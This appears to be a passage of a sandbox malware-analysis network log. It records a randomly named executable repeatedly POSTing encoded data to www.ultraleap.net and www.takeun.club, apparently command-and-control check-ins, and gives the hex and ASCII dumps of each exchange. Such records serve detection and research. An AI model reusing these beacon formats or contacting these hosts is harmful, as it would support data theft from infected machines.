                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6c 4c 59 4c 3d 6b 76 55 58 26 35 76 63 3d 56 67 66 48 58 59 71 6b 6c 6d 4f 66 33 67 49 59 36 4a 58 34 2b 4d 53 77 4c 5a 46 78 33 66 43 34 74 33 55 52 6d 47 76 51 63 38 6c 4f 4c 4f 6d 33 4f 6e 37 74 62 47 42 6c 74 55 43 55 62 32 45 4d 61 6b 61 4e 73 50 35 30 74 4e 71 72 64 30 6e 6e 4e 5a 75 58 43 43 53 58 7a 51 37 76 53 65 48 4f 47 47 4f 31 77 52 37 4c 61 66 34 41 2b 59 75 42 33 59 44 62 31 33 48 4c 56 73 2f 4b 57 63 33 74 77 6c 6e 32 45 46 63 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?lLYL=kvUX&5vc=VgfHXYqklmOf3gIY6JX4+MSwLZFx3fC4t3URmGvQc8lOLOm3On7tbGBltUCUb2EMakaNsP50tNqrd0nnNZuXCCSXzQ7vSeHOGGO1wR7Laf4A+YuB3YDb13HLVs/KWc3twln2EFc="}</script></head></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            45192.168.2.661436217.70.184.50805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:54:23.064888000 CEST770OUTPOST /9iab/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.ultraleap.net
                                                                                                                                            Origin: http://www.ultraleap.net
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 208
                                                                                                                                            Referer: http://www.ultraleap.net/9iab/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 56 36 4d 6a 64 52 38 74 38 77 6a 53 52 47 47 48 32 4a 73 4e 42 61 30 65 61 79 71 33 7a 6e 77 4a 2f 57 39 46 41 75 4e 6a 49 35 30 4e 5a 34 31 62 39 2b 68 32 5a 65 39 75 41 4a 53 57 75 62 46 38 34 41 6d 47 4a 51 45 71 67 53 33 42 2b 5a 69 39 68 6e 58 70 43 31 30 65 45 79 71 43 76 57 72 70 53 61 35 63 4b 50 6a 5a 73 68 36 49 77 37 43 4f 71 65 56 6d 7a 70 58 45 39 31 39 78 32 42 54 77 77 42 39 33 32 72 34 41 63 45 46 44 39 74 37 72 6c 53 77 62 4a 39 79 4a 66 7a 57 43 58 36 59 6a 7a 69 42 52 4d 44 4d 51 4e 52 68 52 73 37 6a 70 46 7a 4a 49 6b 31 39 45 57 56 6f 31 35 37 63 62 32 2b 41 31 70 44 47 66 34 46 38 6a
                                                                                                                                            Data Ascii: 5vc=V6MjdR8t8wjSRGGH2JsNBa0eayq3znwJ/W9FAuNjI50NZ41b9+h2Ze9uAJSWubF84AmGJQEqgS3B+Zi9hnXpC10eEyqCvWrpSa5cKPjZsh6Iw7COqeVmzpXE919x2BTwwB932r4AcEFD9t7rlSwbJ9yJfzWCX6YjziBRMDMQNRhRs7jpFzJIk19EWVo157cb2+A1pDGf4F8j
                                                                                                                                            Oct 10, 2024 12:54:23.668988943 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 10 Oct 2024 10:54:23 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                            Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            46192.168.2.661437217.70.184.50805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:54:25.605915070 CEST794OUTPOST /9iab/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.ultraleap.net
                                                                                                                                            Origin: http://www.ultraleap.net
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 232
                                                                                                                                            Referer: http://www.ultraleap.net/9iab/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 56 36 4d 6a 64 52 38 74 38 77 6a 53 51 69 43 48 6c 71 45 4e 44 36 30 52 66 79 71 33 6c 58 77 4e 2f 57 35 46 41 76 4a 7a 50 4b 63 4e 61 64 52 62 36 4c 56 32 55 2b 39 75 59 5a 53 54 71 62 46 4a 34 41 72 37 4a 55 45 71 67 53 7a 42 2b 62 71 39 68 58 72 71 4e 46 30 63 4a 53 71 41 68 32 72 70 53 61 35 63 4b 4f 47 38 73 68 69 49 77 72 53 4f 72 2f 56 70 77 70 58 48 74 6c 39 78 79 42 54 4f 77 42 39 42 32 70 4d 2b 63 47 4e 44 39 74 4c 72 6d 48 45 63 47 39 79 51 43 6a 58 51 57 4a 4a 36 38 7a 38 52 44 52 6b 38 64 32 74 70 74 4e 69 7a 5a 41 4a 72 32 6c 64 47 57 58 77 48 35 62 63 78 30 2b 34 31 37 55 4b 34 33 78 5a 41 7a 31 41 61 71 7a 4a 36 6d 69 4a 66 58 75 49 74 32 39 36 4f 56 41 3d 3d
                                                                                                                                            Data Ascii: 5vc=V6MjdR8t8wjSQiCHlqEND60Rfyq3lXwN/W5FAvJzPKcNadRb6LV2U+9uYZSTqbFJ4Ar7JUEqgSzB+bq9hXrqNF0cJSqAh2rpSa5cKOG8shiIwrSOr/VpwpXHtl9xyBTOwB9B2pM+cGND9tLrmHEcG9yQCjXQWJJ68z8RDRk8d2tptNizZAJr2ldGWXwH5bcx0+417UK43xZAz1AaqzJ6miJfXuIt296OVA==
                                                                                                                                            Oct 10, 2024 12:54:26.849142075 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 10 Oct 2024 10:54:26 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                            Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0
                                                                                                                                            Oct 10, 2024 12:54:26.849426985 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 10 Oct 2024 10:54:26 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                            Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            47192.168.2.661438217.70.184.50805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:54:28.154716969 CEST1807OUTPOST /9iab/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.ultraleap.net
                                                                                                                                            Origin: http://www.ultraleap.net
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 1244
                                                                                                                                            Referer: http://www.ultraleap.net/9iab/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 56 36 4d 6a 64 52 38 74 38 77 6a 53 51 69 43 48 6c 71 45 4e 44 36 30 52 66 79 71 33 6c 58 77 4e 2f 57 35 46 41 76 4a 7a 50 4b 45 4e 5a 72 4e 62 35 73 4a 32 56 2b 39 75 47 4a 53 53 71 62 46 51 34 44 61 38 4a 55 41 63 67 51 37 42 2f 35 53 39 6e 6c 50 71 57 56 30 63 57 43 71 4e 76 57 71 70 53 61 70 51 4b 50 32 38 73 68 69 49 77 75 57 4f 37 65 56 70 39 4a 58 45 39 31 39 39 32 42 54 31 77 46 5a 2f 32 70 49 75 63 32 74 44 39 4e 62 72 67 31 63 63 5a 4e 79 46 42 6a 57 56 57 4a 46 66 38 7a 67 33 44 56 6b 57 64 78 6c 70 74 36 4c 73 4e 53 51 39 6e 6e 42 32 58 58 6f 63 78 2f 55 6c 35 76 49 72 38 6d 43 76 71 78 64 4d 31 67 42 4e 72 78 4a 39 70 7a 4e 78 56 72 70 6e 34 66 6e 43 43 43 69 36 6c 51 73 49 39 6a 69 49 30 61 32 76 4a 62 30 51 56 30 69 7a 6d 4d 44 4f 52 30 42 59 31 30 68 4d 58 69 54 7a 4d 6f 67 53 4a 4e 7a 68 31 33 49 54 65 6a 35 69 50 47 6a 56 38 75 33 6f 73 77 6c 43 43 6f 6c 72 4b 41 62 73 69 61 65 62 70 37 41 49 77 79 49 7a 63 47 4b 52 76 5a 41 35 6e 64 77 33 36 52 70 61 47 79 2b 5a 2f 53 [TRUNCATED]
                                                                                                                                            Data Ascii: 5vc=V6MjdR8t8wjSQiCHlqEND60Rfyq3lXwN/W5FAvJzPKENZrNb5sJ2V+9uGJSSqbFQ4Da8JUAcgQ7B/5S9nlPqWV0cWCqNvWqpSapQKP28shiIwuWO7eVp9JXE91992BT1wFZ/2pIuc2tD9Nbrg1ccZNyFBjWVWJFf8zg3DVkWdxlpt6LsNSQ9nnB2XXocx/Ul5vIr8mCvqxdM1gBNrxJ9pzNxVrpn4fnCCCi6lQsI9jiI0a2vJb0QV0izmMDOR0BY10hMXiTzMogSJNzh13ITej5iPGjV8u3oswlCColrKAbsiaebp7AIwyIzcGKRvZA5ndw36RpaGy+Z/SudENhvF6u12ftx0s6wSlB0gkQdaMnmsMUbVcuzpHn+OAoH3nuqnANHY+gErkQ/aFT2QKWqZcJPJxv5/L7UPozbqUEIokXjpmM91d91vYm6v3eJ6Jzh9jvPWHyXcTnoX/TMZmRefeWvKxHhQTQNHpn11XDQfgC5BpyhGz2q2lkxRDpeHtL2R3sw5orJqw8jWa7O0UIb2HltcZLVDbKoBwouBAb3hiRPWum3CL2am8i+LFn+vJtLEyEnltUcxbgeOs4iueKGc1+hmZLZJbbiP+5RSrd+HYdTIISV8Nb12UGCIT+WtXQEy591CjdQO24P202D+CVi/1BAKx3SceUXOrw2xby0W2xnPd+d5X7DzceqmH0+quUonM31F6nR9cVJkM80KRdG7qDUCCmpGmErih/taX40Y26vM67expY0KdvCDOdaMbtuAo2Sl9UDFZvjUv1b8A1FpeU1UK+rJ1QF0Rd/fq5VJvu8KLM3eW5W6cwHHScUtf5X407im7MZGKKNFFzG1WHNFqIMBaBTXnL0DUpnzMe9NkODT+Y7yHT3q2XIVNJgO0dWV6eRMuc/vWatP6PWt3/+fFUes/FaHMBRQDT1Nu1RyWFpRfY8XXws9SuHanXBT6+/INb8R0G42H0XKtfli+HyWmObHqLBF16GMP3iT1Bw23CF0mv3 [TRUNCATED]


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            48192.168.2.661440217.70.184.50805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:54:30.693490028 CEST506OUTGET /9iab/?5vc=Y4kDenUp1gO2Q0jRiZUxMqowayno9Xsk2AlmB9dDBLZOc6V7t85yetNjHcmH7slMwyaAfgZ0o1D1+bSHqn/hHAccGgPOonKwLb4ZCbzMyRuUgcD/rdhA1bXMlxtgx1iShR1I/OE=&lLYL=kvUX HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Host: www.ultraleap.net
                                                                                                                                            Connection: close
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Oct 10, 2024 12:54:31.416568041 CEST1236INHTTP/1.1 200 OK
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 10 Oct 2024 10:54:31 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Language
                                                                                                                                            Data Raw: 37 38 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 65 67 69 73 74 65 72 65 64 20 77 69 74 68 20 47 61 6e 64 69 2e 6e 65 74 2e 20 49 74 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 70 61 72 6b 65 64 20 62 79 20 74 68 65 20 6f 77 6e 65 72 2e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 75 6c 74 72 61 6c 65 61 70 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 [TRUNCATED]
                                                                                                                                            Data Ascii: 785<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>ultraleap.net</title> <link rel="stylesheet" type="text/css" href="main-78844350.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Montserrat-Regular.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Montserrat-SemiBold.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://wh [TRUNCATED]
                                                                                                                                            Oct 10, 2024 12:54:31.416805029 CEST890INData Raw: 72 61 6c 65 61 70 2e 6e 65 74 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c 74 73 20 6f 66 20 75 6c 74 72 61 6c 65 61 70 2e 6e 65 74 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 61 3e 20 74 6f 20 67 65 74 20 74 68
                                                                                                                                            Data Ascii: raleap.net"><strong>View the WHOIS results of ultraleap.net</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Parking_2023-outerbox_2j18t"><p class="Parking_202


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            49192.168.2.6614413.33.130.190805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:54:36.461833954 CEST764OUTPOST /ow7w/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.takeun.club
                                                                                                                                            Origin: http://www.takeun.club
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 208
                                                                                                                                            Referer: http://www.takeun.club/ow7w/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 6b 33 75 63 55 68 35 6f 61 44 2f 2b 4f 2f 5a 61 42 6b 61 2b 39 45 57 63 45 62 51 34 7a 35 79 52 37 62 6f 6b 70 35 44 2f 66 48 50 74 68 6e 54 31 2b 67 74 46 47 62 4d 6f 52 33 70 67 33 37 42 63 54 70 6a 37 76 6c 36 66 44 67 77 41 44 32 67 57 56 57 5a 36 59 4d 48 2f 79 66 38 78 69 61 47 58 4a 52 4a 51 53 61 32 62 79 42 57 62 6f 52 35 38 5a 68 45 56 77 72 4e 59 33 65 67 4c 4a 71 47 30 66 68 45 77 56 37 33 77 4f 33 39 68 65 64 71 7a 69 57 47 51 73 7a 46 31 6f 54 71 4f 31 6c 63 4b 4c 57 46 43 34 31 47 6a 4c 67 69 61 4d 44 65 6a 53 31 50 67 41 37 46 35 51 4c 6f 4f 65 56 78 36 33 38 45 6d 77 37 64 50 42 4a 30 4d
                                                                                                                                            Data Ascii: 5vc=k3ucUh5oaD/+O/ZaBka+9EWcEbQ4z5yR7bokp5D/fHPthnT1+gtFGbMoR3pg37BcTpj7vl6fDgwAD2gWVWZ6YMH/yf8xiaGXJRJQSa2byBWboR58ZhEVwrNY3egLJqG0fhEwV73wO39hedqziWGQszF1oTqO1lcKLWFC41GjLgiaMDejS1PgA7F5QLoOeVx638Emw7dPBJ0M


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            50192.168.2.6614423.33.130.190805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:54:39.009206057 CEST788OUTPOST /ow7w/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.takeun.club
                                                                                                                                            Origin: http://www.takeun.club
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 232
                                                                                                                                            Referer: http://www.takeun.club/ow7w/
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.1.0 Waterfox/38.1.0
                                                                                                                                            Data Raw: 35 76 63 3d 6b 33 75 63 55 68 35 6f 61 44 2f 2b 63 76 70 61 4d 6e 79 2b 73 55 57 62 4b 37 51 34 35 5a 7a 59 37 62 55 6b 70 34 58 56 66 79 66 74 67 47 50 31 35 56 4e 46 44 62 4d 6f 65 58 70 68 35 62 42 48 54 70 76 7a 76 6c 32 66 44 6d 63 41 44 30 34 57 56 6c 78 31 43 38 48 48 2f 2f 38 2f 68 71 47 58 4a 52 4a 51 53 61 69 31 79 42 75 62 6f 6c 39 38 57 67 45 57 75 62 4d 71 6e 75 67 4c 62 61 47 77 66 68 45 6f 56 36 72 65 4f 30 46 68 65 66 69 7a 69 6e 47 50 31 44 45 38 31 6a 72 4a 7a 55 70 59 41 51 42 50 34 7a 61 5a 62 44 65 41 41 56 66 35 4f 47 50 44 53 72 6c 37 51 4a 77 38 65 31 78 51 31 38 38 6d 69 73 52 6f 4f 39 52 76 68 43 44 4a 5a 31 71 31 47 4e 67 37 6b 46 37 51 38 48 64 41 53 77 3d 3d
                                                                                                                                            Data Ascii: 5vc=k3ucUh5oaD/+cvpaMny+sUWbK7Q45ZzY7bUkp4XVfyftgGP15VNFDbMoeXph5bBHTpvzvl2fDmcAD04WVlx1C8HH//8/hqGXJRJQSai1yBubol98WgEWubMqnugLbaGwfhEoV6reO0FhefizinGP1DE81jrJzUpYAQBP4zaZbDeAAVf5OGPDSrl7QJw8e1xQ188misRoO9RvhCDJZ1q1GNg7kF7Q8HdASw==


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            51192.168.2.6614433.33.130.190805788C:\Program Files (x86)\eNBWORsxNPPbckVMLflmySkNuvuVtmDXumyYuKDJR\YKSXcXcWryn.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            Oct 10, 2024 12:54:41.557099104 CEST1801OUTPOST /ow7w/ HTTP/1.1
                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Host: www.takeun.club
                                                                                                                                            Origin: http://www.takeun.club
                                                                                                                                            Connection: close
                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Content-Length: 1244
                                                                                                                                            Referer: http://www.takeun.club/ow7w/
